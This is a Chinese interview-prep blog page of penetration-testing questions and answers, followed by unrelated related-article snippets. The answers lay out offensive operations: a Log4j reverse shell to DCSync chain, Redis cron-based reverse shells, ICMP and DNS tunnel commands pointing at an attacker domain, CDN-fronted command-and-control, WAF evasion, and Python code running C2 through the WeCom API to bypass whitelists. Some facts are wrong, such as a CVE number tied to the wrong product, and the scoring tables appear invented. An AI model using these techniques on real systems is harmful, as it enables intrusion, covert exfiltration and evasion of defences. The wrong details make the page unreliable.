2025年滲透測試面試題總結-某深信服-深藍攻防實驗室(題目+回答)

網絡安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

目錄

深信服-深藍攻防實驗室

一、內網攻擊核心思路(2025版)

1. 攻擊階段分層

2. 最新技術要點

二、國護刷分策略與通用性靶標挖掘

1. 刷分核心邏輯

2. 得分最大化策略

三、數據庫與云主機刷分規則解析

1. 評分標準(模擬國護賽制)

2. 刷分實操案例

四、內網多級代理技術選型與實現

1. 代理工具鏈對比

2. TCP/UDP不出網場景下的代理方案

五、多級代理結合CDN中轉的實現

1. CDN中轉架構設計

2. 流量混淆技術

六、內網ACL白名單繞過策略

1. 繞過技術分類

2. 實現案例:基于企業微信的C2通信

深信服-深藍攻防實驗室

內網攻擊思路
國護刷分策略,如何尋找通用性靶標思路
數據庫 主機云center 刷滿是多少分(看你打的多不多 對分的規則熟悉不)
內網的多級代理用什么東西代理
如果tcp和udp不出網,用什么策略來進行代理的搭建
多級代理如何做一個cdn進行中轉,具體怎么實現
內網acl策略 如果是白名單,如果繞過這個白名單進行出網上線 ip和域名的都有可能

一、內網攻擊核心思路(2025版)

1. 攻擊階段分層
階段核心目標關鍵技術
初始突破獲取第一臺內網主機權限釣魚(LNK+ISO鏡像)、Web漏洞(Fastjson/Log4j)、云服務元數據泄露
信息收集繪制內網拓撲與資產清單自動化掃描(CrackMapExec)、流量嗅探(Responder)、云資產API爬取(AWS CLI)
橫向擴展突破域/云環境隔離NTLM Relay(ADCS漏洞)、Kubernetes RBAC濫用、云憑據橫向移動(Pacu工具鏈)
權限維持繞過晶核模式/EDR檢測WMI事件訂閱、內存馬(Tomcat Filter型)、無文件注冊表鍵(COM劫持)
數據外泄隱蔽傳輸敏感數據DNS隧道(dnschef)、HTTPS加密分段傳輸、云存儲桶直傳(AWS S3預簽名URL)
2. 最新技術要點
  • 云原生攻擊:利用Kubernetes的kubelet未授權訪問(10250端口)部署惡意Pod,逃逸至宿主機。
  • 零信任繞過:偽造合法設備指紋(MAC地址+BIOS UUID),通過持續心跳包維持“可信”狀態。
  • AI對抗:使用GAN生成對抗性流量(如HTTP請求頭擾動),繞過基于機器學習的WAF檢測。

二、國護刷分策略與通用性靶標挖掘

1. 刷分核心邏輯
  • 目標價值分級

    目標類型基礎分加成系數示例場景
    核心數據庫(Oracle)50分×2.0獲取金融交易記錄或用戶隱私數據
    域控服務器100分×1.5利用Zerologon漏洞重置域控機器賬號
    云控制臺(vCenter)80分×1.2通過CVE-2024-XXXX漏洞獲取管理員權限
    邊緣設備(攝像頭)20分×0.5弱口令爆破(admin/12345)
  • 通用性靶標挖掘

    • 高頻漏洞利用
      • Web類:Fastjson 1.2.83以下版本(AutoType繞過)、Spring Cloud Gateway RCE(CVE-2024-21410)。
      • 協議類:SMBv1協議漏洞(永恒之藍變種)、Redis未授權訪問(主從復制加載惡意模塊)。
    • 被動情報收集
      • 使用Shodan搜索暴露的Jenkins(端口8080)、Confluence(端口8090)服務,爆破默認憑據。
      • 分析GitHub代碼倉庫,提取硬編碼的API密鑰或數據庫連接字符串。
2. 得分最大化策略
  • 漏洞組合利用
    text1. 通過Log4j漏洞(CVE-2021-44228)注入JNDI載荷 → 觸發反向Shell 2. 利用Shell上傳Mimikatz提取本地憑證 → 橫向移動到域控 3. 通過DCSync導出域哈希 → 破解高權限賬號 
  • 供應鏈攻擊
    • 入侵第三方協作平臺(如Jira、Slack),植入惡意插件或文檔模板。
    • 利用npm/pypi包依賴劫持(Typosquatting攻擊),在CI/CD流程中注入后門。

三、數據庫與云主機刷分規則解析

1. 評分標準(模擬國護賽制)
  • 數據庫類

    動作得分限制條件
    未授權訪問(Redis)30分需導出至少10條敏感數據(如用戶Session)
    SQL注入(Oracle)50分需獲取DBA權限并導出表結構
    數據篡改(MySQL)40分需修改至少3個表字段并留存日志證據
  • 云主機類

    動作得分限制條件
    元數據泄露(AWS)40分需獲取IAM角色臨時憑據并列出S3桶
    容器逃逸(Docker)60分需逃逸至宿主機并提取root權限證明
    控制臺接管(阿里云)80分需通過RAM漏洞創建高權限子賬號
2. 刷分實操案例
  • Redis未授權訪問刷分鏈
    1. 利用主從復制漏洞加載惡意.so模塊 → 執行系統命令(20分)。
    2. 通過CONFIG SET dir /var/spool/cron寫入計劃任務 → 反彈Shell(30分)。
    3. 導出RDB文件解析用戶會話Token → 提交證據(10分)。

四、內網多級代理技術選型與實現

1. 代理工具鏈對比
工具協議支持適用場景抗檢測能力
reGeorgHTTP/HTTPSWeb服務器(PHP/ASPX/JSP)中等(依賴Web服務正常性)
ChiselTCP/UDP加密隧道穿透防火墻高(TLS加密+流量混淆)
iodineDNS嚴格網絡隔離環境極高(偽裝為合法DNS查詢)
ptunnel-ngICMP僅允許Ping出網中等(依賴ICMP速率限制)
2. TCP/UDP不出網場景下的代理方案
  • ICMP隧道
    1. 攻擊機啟動服務端:ptunnel-ng -i eth0 -r 192.168.1.1
    2. 目標機連接:ptunnel-ng -p 192.168.1.1 -l 1080 -da 10.10.10.10 -dp 22(將本地1080端口流量通過ICMP隧道轉發至10.10.10.10:22)。
      優勢:繞過傳統防火墻對TCP/UDP端口的監控。
  • DNS隧道
    1. 配置域名(如tunnel.attacker.com )NS記錄指向攻擊機IP。
    2. 目標機運行客戶端:iodine -f -P password 隧道域名,建立加密通道。
      繞過ACL策略:利用合法DNS服務商(如Cloudflare)中轉流量,避免IP封禁。

五、多級代理結合CDN中轉的實現

1. CDN中轉架構設計
plaintext[目標內網] → [反向代理1(Nginx)] → [CDN節點(Cloudflare)] → [攻擊機(C2服務器)] 
  • 實現步驟
    1. 域名配置:將C2域名接入CDN(如Cloudflare),開啟SSL強制加密。
    2. 反向代理設置:在Nginx中配置location /proxy路徑,將請求轉發至內網代理工具端口。
    3. 證書規避:使用Let's Encrypt泛域名證書,避免CDN的證書指紋檢測。
2. 流量混淆技術
  • HTTP/2多路復用:將代理流量封裝為HTTP/2流,頭部壓縮降低特征暴露。
  • 內容偽裝
    • 使用gzip壓縮Payload,偽裝為JSON/圖片資源。
    • 在響應中插入隨機Cookie和垃圾數據,干擾WAF正則匹配。

六、內網ACL白名單繞過策略

1. 繞過技術分類
類型方法原理
協議濫用DNS隧道+DoH/DoT通過加密DNS協議(如Cloudflare DoH)傳輸數據
云服務利用阿里云OSS預簽名URL將數據封裝為OSS文件上傳/下載請求
可信服務劫持微信/釘釘Webhook API利用企業白名單中的第三方服務回調傳輸數據
2. 實現案例:基于企業微信的C2通信
  1. 注冊企業微信應用:創建自建應用,獲取CorpIDSecret
  2. API通信加密
    python# 發送指令 requests.post("https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=xxx", json={"touser": "@all", "msgtype": "text", "text": {"content": base64.b64encode(cmd)}}) # 接收結果 resp = requests.get("https://qyapi.weixin.qq.com/cgi-bin/media/get?access_token=xxx&media_id=yyy") result = base64.b64decode(resp.content) 
  3. 防御對抗:動態更換media_id并模擬正常用戶行為(如發送圖片/文件)。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/73177.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/73177.shtml
英文地址,請注明出處:http://en.pswp.cn/web/73177.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

JAVA學習*Object類

Object類 Object類是所有類的父類 類中有一些方法(都需要掌握) toString()方法 在學習類的對象的時候有介紹過了,當我們重新給此方法就會打印類與對象的信息 equals()方法 在Java中的比較, 如果左右兩側是基本類型變量&#…

《Operating System Concepts》閱讀筆記:p471-p472

《Operating System Concepts》學習第 37 天,p471-p472 總結,總計 2 頁。 一、技術總結 1.NAS (1)定義 network-attached storage (NAS):Storage accessed from a computer over a network. 雖然平時經常看到 NAS 這個名稱,之…

gonet開源游戲服務器環境配置

1.mysql搭建 搜索mysql-server apt安裝包名 sudo apt search mysql-server 安裝mysql-server sudo apt-get install mysql-server 安裝完成后會,啟動mysql服務及創建系統服務 查看服務狀態 systemctl status mysql.service 使用超級權限登陸mysql sudo mysql 授…

HarmonyOS NEXT(九) :圖形渲染體系

HarmonyOS NEXT(九) :圖形渲染體系 前些天發現了一個巨牛的人工智能學習網站,通俗易懂,風趣幽默,可以分享一下給大家。點擊跳轉到網站。 https://www.captainbed.cn/ccc 文章目錄 HarmonyOS NEXT&#xff0…

網絡安全威脅與防護措施(上)

1. SQL注入(SQL Injection) SQL注入是一種常見的安全漏洞,攻擊者通過在用戶輸入中插入惡意的SQL代碼,從而篡改、操控數據庫,執行未授權的數據庫操作,如查詢、修改、刪除數據,甚至獲取系統控制權…

3.22模擬面試

前端模擬面試(1 年經驗) 面試時長:40-60 分鐘 面試難度:初中級 技術棧:Vue 3、TypeScript、微前端(qiankun)、Webpack/Rspack、Ant Design、組件庫遷移 一、基礎知識 HTML & CSS 介紹一下…

kotlin 函數引用

引言 先確認一下,什么叫做引用 Object obj new Object() //這里的obj就是一個強引用 再確認一個結論: lambda 屬于函數類型對象 。 fun methodResponseResult(msg: String , respo:(Int, String)->Unit){}fun methodRespoResunt(type: Int ,msg: S…

微前端qiankun框架的使用

文章描述 隨著工作時間的增加,發現公司的項目逐漸多了起來,有一個項目比較龐大,是需要集成多個子系統而形成的大項目。其中便是使用微前端的概念qiankun框架來集成其他多個子項目的。接下來,一起來看一下qiankun框架的具體使用方…

基于CVX優化器的儲能電池調峰調頻算法matlab仿真

目錄 1.課題概述 2.系統仿真結果 3.核心程序與模型 4.系統原理簡介 4.1 原理概述 4.2 CVX工具箱概述 5.完整工程文件 1.課題概述 基于CVX優化器的儲能電池調峰調頻算法matlab仿真。CVX 是一種用于求解凸優化問題的強大工具。凸優化問題具有良好的數學性質,能…

回歸——數學公式推導全過程

文章目錄 一、案例引入 二、如何求出正確參數 1. 最速下降法 1)多項式回歸 2)多重回歸 2. 隨機梯度下降法 一、案例引入 以Web廣告和點擊量的關系為例來學習回歸,假設投入的廣告費和點擊量呈現下圖對應關系。 思考:如果花了…

微服務中的服務發現

微服務中的服務發現 什么是服務發現 服務發現是微服務架構中的關鍵機制,用于確定各個微服務的地址。例如,在一個 API Server 服務中,我們可能需要調用 User 服務來處理用戶注冊、登錄和信息查詢,也可能需要 Product 服務來獲取商…

C#與西門子PLC的六大通信庫

C#與西門子PLC的六大通信庫: 一、S7.NET S7.NET是一款開源的S7協議通信庫,支持西門子S7通信。 二、Sharp7 Sharp7與S7.NET一樣,是一款.NET版本的S7通信庫。 三、Snap7 Snap7是一個開源的C通信庫,支持西門子S7通信。 四、Prodave P…

IOS接入微信方法

導入SDK 和配置 SDK 的不做介紹; 1 在IOS 開發者中心 Identifiers 打開‘Associated Domains’ 2 建立一個文件(不帶后綴的)apple-app-site-association, teamid在 IOS 開發者中心的會員找,appid在 xcode里面找 {"applin…

DHCPv6 Stateless Vs Stateful Vs Stateless Stateful

DHCPv6常見配置模式 在 IPv6 網絡中,DHCPv6 的 Stateless(無狀態)、Stateful(有狀態) 和 Stateless + Stateful(混合模式) 是三種常見的配置模式。它們的主要區別在于客戶端如何獲取 IPv6 地址和其他網絡配置信息(如 DNS 服務器)。 Stateless(無狀態)模式 Statele…

HTTPS協議—加密算法和中間攻擊人的博弈

活動發起人小虛竹 想對你說: 這是一個以寫作博客為目的的創作活動,旨在鼓勵大學生博主們挖掘自己的創作潛能,展現自己的寫作才華。如果你是一位熱愛寫作的、想要展現自己創作才華的小伙伴,那么,快來參加吧&#xff01…

Java替換jar包中class文件

在更新java應用版本的運維工作中,由于一些原因,開發沒辦法給到完整的jar包,這個時候,就可以只將修改后的某個Java類的class文件替換掉原來iar包中的class文件,重新啟動服務即可: 1、將jar包和將要替換的cl…

【UI設計】一些好用的免費圖標素材網站

阿里巴巴矢量圖標庫https://www.iconfont.cn/國內最大的矢量圖標庫之一,擁有 800 萬 圖標資源。特色功能包括團隊協作、多端適配、定制化編輯等,適合企業級項目、電商設計、中文產品開發等場景。IconParkhttps://iconpark.oceanengine.com/home字節跳動…

【10】高效存儲MongoDB的用法

目錄 一、什么是MongoDB 二、準備工作 (1)安裝MongoDB ?(2)安裝pymongo庫 三、連接MongoDB 四、指定數據庫 五、指定集合 六、插入數據 (1) insert 方法 (2)insert_one(…

MATLAB+Arduino利用板上的按鍵控制板上Led燈

幾年不使用,之前的知識都忘掉了。需要逐步撿起來。 1 熟悉按鍵的使用 2熟悉燈的控制 1 電路 我們將通過 MATLAB 的 Arduino 支持包與 Arduino 板通信,讀取按鍵狀態并控制 LED 燈的亮滅。 按鍵:連接到 Arduino 的數字引腳(例如…

《深度學習》——YOLOv3詳解

文章目錄 YOLOv3簡介YOLOv3核心原理YOLOv3改進YOLOv3網絡結構 YOLOv3簡介 YOLOv3(You Only Look Once, version 3)是一種先進的實時目標檢測算法,由 Joseph Redmon 和 Ali Farhadi 開發。它在目標檢測領域表現出色,具有速度快、精…